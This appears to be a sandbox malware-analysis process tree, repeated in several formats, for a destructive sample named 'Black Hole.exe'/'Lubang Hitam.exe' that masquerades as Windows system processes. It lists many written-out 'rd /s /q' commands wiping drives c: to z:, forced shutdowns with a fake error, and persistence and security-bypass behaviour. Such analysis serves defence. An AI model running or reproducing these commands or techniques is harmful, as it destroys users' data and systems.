    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 1452)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q n:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 3324)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q m:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 3016)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q l:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 728)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q k:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 1832)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q j:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 3448)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q i:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 1580)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q h:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 428)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q g:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 564)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q f:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 1956)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q e:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 2168)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q d:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 3928)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q c:
    C:\Windows\Black Hole.exe  (level 3, PID 4692)  cmdline: "C:\Windows\Black Hole.exe"
      - Modifies WinLogon for persistence
      - Modifies visibility of file extensions in Explorer
      - Modifies visibility of hidden/system files in Explorer
      - Windows security bypass
      - Disables RegEdit via registry modification
      - Executes dropped EXE
      - Loads dropped DLL
      - Modifies system executable filetype association
      - Windows security modification
      - Adds Run key to start application
      - Enumerates connected drives
      - Drops file in System32 directory
      - Drops file in Windows directory
      - Modifies Control Panel
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of SetWindowsHookEx
      - System policy modification
      C:\WINDOWS\SysWOW64\shutdown.exe  (level 4, PID 1840)  cmdline: C:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\Black Hole.exe  (level 4, PID 1820)  cmdline: "C:\Windows\Black Hole.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of SetWindowsHookEx
        C:\WINDOWS\SysWOW64\shutdown.exe  (level 5, PID 3500)  cmdline: C:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!
          C:\Windows\System32\Conhost.exe  (level 6, PID 3600)  cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      C:\Windows\SysWOW64\Lubang Hitam.exe  (level 4, PID 2452)  cmdline: "C:\Windows\system32\Lubang Hitam.exe"
        - Executes dropped EXE
        - Drops file in System32 directory
        - Drops file in Windows directory
        - Suspicious use of SetWindowsHookEx
        C:\WINDOWS\SysWOW64\shutdown.exe  (level 5, PID 2788)  cmdline: C:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!
      C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE  (level 4, PID 116)  cmdline: "C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"
        - Executes dropped EXE
        - Suspicious use of SetWindowsHookEx
        C:\WINDOWS\SysWOW64\shutdown.exe  (level 5, PID 944)  cmdline: C:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!
      C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE  (level 4, PID 320)  cmdline: "C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"
        - Executes dropped EXE
        - Suspicious use of SetWindowsHookEx
        C:\WINDOWS\SysWOW64\shutdown.exe  (level 5, PID 3904)  cmdline: C:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!
          C:\Windows\System32\Conhost.exe  (level 6, PID 2340)  cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE  (level 4, PID 4800)  cmdline: "C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"
        - Executes dropped EXE
        - Suspicious use of SetWindowsHookEx
        C:\WINDOWS\SysWOW64\shutdown.exe  (level 5, PID 4476)  cmdline: C:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!
          C:\Windows\System32\Conhost.exe  (level 6, PID 940)  cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE  (level 4, PID 1464)  cmdline: "C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"
        - Executes dropped EXE
        - Suspicious use of SetWindowsHookEx
        C:\WINDOWS\SysWOW64\shutdown.exe  (level 5, PID 2268)  cmdline: C:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!
      C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE  (level 4, PID 4328)  cmdline: "C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"
        - Executes dropped EXE
        - Suspicious use of SetWindowsHookEx
        C:\WINDOWS\SysWOW64\shutdown.exe  (level 5, PID 724)  cmdline: C:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!
    C:\Windows\SysWOW64\Lubang Hitam.exe  (level 3, PID 4768)  cmdline: "C:\Windows\system32\Lubang Hitam.exe"
      - Executes dropped EXE
      - Drops file in System32 directory
      - Drops file in Windows directory
      - Suspicious use of SetWindowsHookEx
      C:\WINDOWS\SysWOW64\shutdown.exe  (level 4, PID 1580)  cmdline: C:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!
        - Suspicious use of AdjustPrivilegeToken
    C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE  (level 3, PID 4840)  cmdline: "C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
      C:\WINDOWS\SysWOW64\shutdown.exe  (level 4, PID 1084)  cmdline: C:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!
        - Suspicious use of AdjustPrivilegeToken
    C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE  (level 3, PID 2156)  cmdline: "C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
      C:\WINDOWS\SysWOW64\shutdown.exe  (level 4, PID 4752)  cmdline: C:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!
        - Suspicious use of AdjustPrivilegeToken
    C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE  (level 3, PID 4572)  cmdline: "C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
      C:\WINDOWS\SysWOW64\shutdown.exe  (level 4, PID 928)  cmdline: C:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!
        - Suspicious use of AdjustPrivilegeToken
        C:\Windows\System32\Conhost.exe  (level 5, PID 2352)  cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE  (level 3, PID 1400)  cmdline: "C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
      C:\WINDOWS\SysWOW64\shutdown.exe  (level 4, PID 4772)  cmdline: C:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!
        - Suspicious use of AdjustPrivilegeToken
    C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE  (level 3, PID 1732)  cmdline: "C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
      C:\WINDOWS\SysWOW64\shutdown.exe  (level 4, PID 776)  cmdline: C:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!
  C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE  (level 2, PID 3820)  cmdline: "C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"
    - Modifies WinLogon for persistence
    - Modifies visibility of file extensions in Explorer
    - Modifies visibility of hidden/system files in Explorer
    - Windows security bypass
    - Disables RegEdit via registry modification
    - Executes dropped EXE
    - Modifies system executable filetype association
    - Windows security modification
    - Adds Run key to start application
    - Enumerates connected drives
    - Drops autorun.inf file
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Modifies Control Panel
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    - System policy modification
    C:\WINDOWS\SysWOW64\shutdown.exe  (level 3, PID 2352)  cmdline: C:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!
      - Suspicious use of AdjustPrivilegeToken
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 1576)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q z:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 4796)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q y:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 1196)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q x:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 4308)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q w:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 396)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q v:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 1952)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q u:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 2448)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q t:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 1400)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q s:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 4084)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q r:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 2868)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q q:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 2856)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q p:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 4348)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q o:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 4908)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q n:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 4452)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q m:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 4880)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q l:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 2232)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q k:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 4712)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q j:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 4840)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q i:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 4924)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q h:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 2436)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q g:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 1772)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q f:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 4568)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q e:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 4440)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q d:
    C:\WINDOWS\SysWOW64\cmd.exe  (level 3, PID 4696)  cmdline: C:\WINDOWS\system32\cmd.exe /c rd /s /q c:
C:\Windows\Black Hole.exe"C:\Windows\Black Hole.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:1776 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1400
-
-
-
C:\Windows\SysWOW64\Lubang Hitam.exe"C:\Windows\system32\Lubang Hitam.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:1952 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3532
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2264 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2340
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5096 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5068
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3320 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2200
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2180 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3028
-
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:940 -
C:\WINDOWS\SysWOW64\shutdown.exeC:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found!4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1020
-
-
-
-
  [depth 2] C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE | "C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE" | PID:816
  - Modifies WinLogon for persistence
  - Modifies visibility of file extensions in Explorer
  - Modifies visibility of hidden/system files in Explorer
  - Windows security bypass
  - Disables RegEdit via registry modification
  - Executes dropped EXE
  - Modifies system executable filetype association
  - Windows security modification
  - Adds Run key to start application
  - Enumerates connected drives
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Modifies Control Panel
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  - System policy modification
    [depth 3] C:\WINDOWS\SysWOW64\shutdown.exe | C:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found! | PID:3304
    - Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q z: | PID:776
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q y: | PID:4800
      [depth 4] C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID:4696
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q x: | PID:2556
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q w: | PID:2432
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q v: | PID:3740
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q u: | PID:4444
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q t: | PID:5040
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q s: | PID:1832
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q r: | PID:4032
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q q: | PID:4004
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q p: | PID:3020
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q o: | PID:2356
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q n: | PID:5060
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q m: | PID:4352
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q l: | PID:3228
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q k: | PID:3936
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q j: | PID:4232
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q i: | PID:5052
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q h: | PID:2680
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q g: | PID:4016
      [depth 4] C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID:2612
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q f: | PID:4732
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q e: | PID:2352
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q d: | PID:5028
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q c: | PID:1784
    [depth 3] C:\Windows\Black Hole.exe | "C:\Windows\Black Hole.exe" | PID:2100
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetWindowsHookEx
      [depth 4] C:\WINDOWS\SysWOW64\shutdown.exe | C:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found! | PID:3712
      - Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Windows\SysWOW64\Lubang Hitam.exe | "C:\Windows\system32\Lubang Hitam.exe" | PID:4784
    - Executes dropped EXE
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Suspicious use of SetWindowsHookEx
      [depth 4] C:\WINDOWS\SysWOW64\shutdown.exe | C:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found! | PID:2244
      - Suspicious use of AdjustPrivilegeToken
        [depth 5] C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID:2372
    [depth 3] C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE | "C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE" | PID:3104
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
      [depth 4] C:\WINDOWS\SysWOW64\shutdown.exe | C:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found! | PID:1196
      - Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE | "C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE" | PID:4032
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
      [depth 4] C:\WINDOWS\SysWOW64\shutdown.exe | C:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found! | PID:4764
      - Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE | "C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE" | PID:1952
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
      [depth 4] C:\WINDOWS\SysWOW64\shutdown.exe | C:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found! | PID:1528
      - Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE | "C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE" | PID:3216
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
      [depth 4] C:\WINDOWS\SysWOW64\shutdown.exe | C:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found! | PID:652
    [depth 3] C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE | "C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE" | PID:4080
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
      [depth 4] C:\WINDOWS\SysWOW64\shutdown.exe | C:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found! | PID:3328
  [depth 2] C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE | "C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE" | PID:3496
  - Modifies WinLogon for persistence
  - Modifies visibility of file extensions in Explorer
  - Modifies visibility of hidden/system files in Explorer
  - Windows security bypass
  - Disables RegEdit via registry modification
  - Executes dropped EXE
  - Modifies system executable filetype association
  - Windows security modification
  - Adds Run key to start application
  - Enumerates connected drives
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Modifies Control Panel
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  - System policy modification
    [depth 3] C:\WINDOWS\SysWOW64\shutdown.exe | C:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found! | PID:2372
    - Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q z: | PID:2900
      [depth 4] C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID:4568
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q y: | PID:564
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q x: | PID:2620
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q w: | PID:1052
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q v: | PID:1576
      [depth 4] C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID:2436
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q u: | PID:748
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q t: | PID:3768
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q s: | PID:3196
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q r: | PID:4772
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q q: | PID:5088
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q p: | PID:1532
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q o: | PID:1244
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q n: | PID:2244
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q m: | PID:532
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q l: | PID:732
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q k: | PID:3732
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q j: | PID:5036
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q i: | PID:3032
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q h: | PID:4796
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q g: | PID:4268
      [depth 4] C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID:4440
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q f: | PID:4528
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q e: | PID:4192
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q d: | PID:4252
    [depth 3] C:\WINDOWS\SysWOW64\cmd.exe | C:\WINDOWS\system32\cmd.exe /c rd /s /q c: | PID:228
    [depth 3] C:\Windows\Black Hole.exe | "C:\Windows\Black Hole.exe" | PID:2460
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetWindowsHookEx
      [depth 4] C:\WINDOWS\SysWOW64\shutdown.exe | C:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found! | PID:3644
      - Suspicious use of AdjustPrivilegeToken
        [depth 5] C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID:4716
    [depth 3] C:\Windows\SysWOW64\Lubang Hitam.exe | "C:\Windows\system32\Lubang Hitam.exe" | PID:2092
    - Executes dropped EXE
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Suspicious use of SetWindowsHookEx
      [depth 4] C:\WINDOWS\SysWOW64\shutdown.exe | C:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found! | PID:4268
      - Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE | "C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE" | PID:4064
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
      [depth 4] C:\WINDOWS\SysWOW64\shutdown.exe | C:\WINDOWS\system32\shutdown.exe -s -f -t 3600 -c An Error Occured. System Not Found! | PID:1396
      - Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE | "C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE" | PID:4964
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
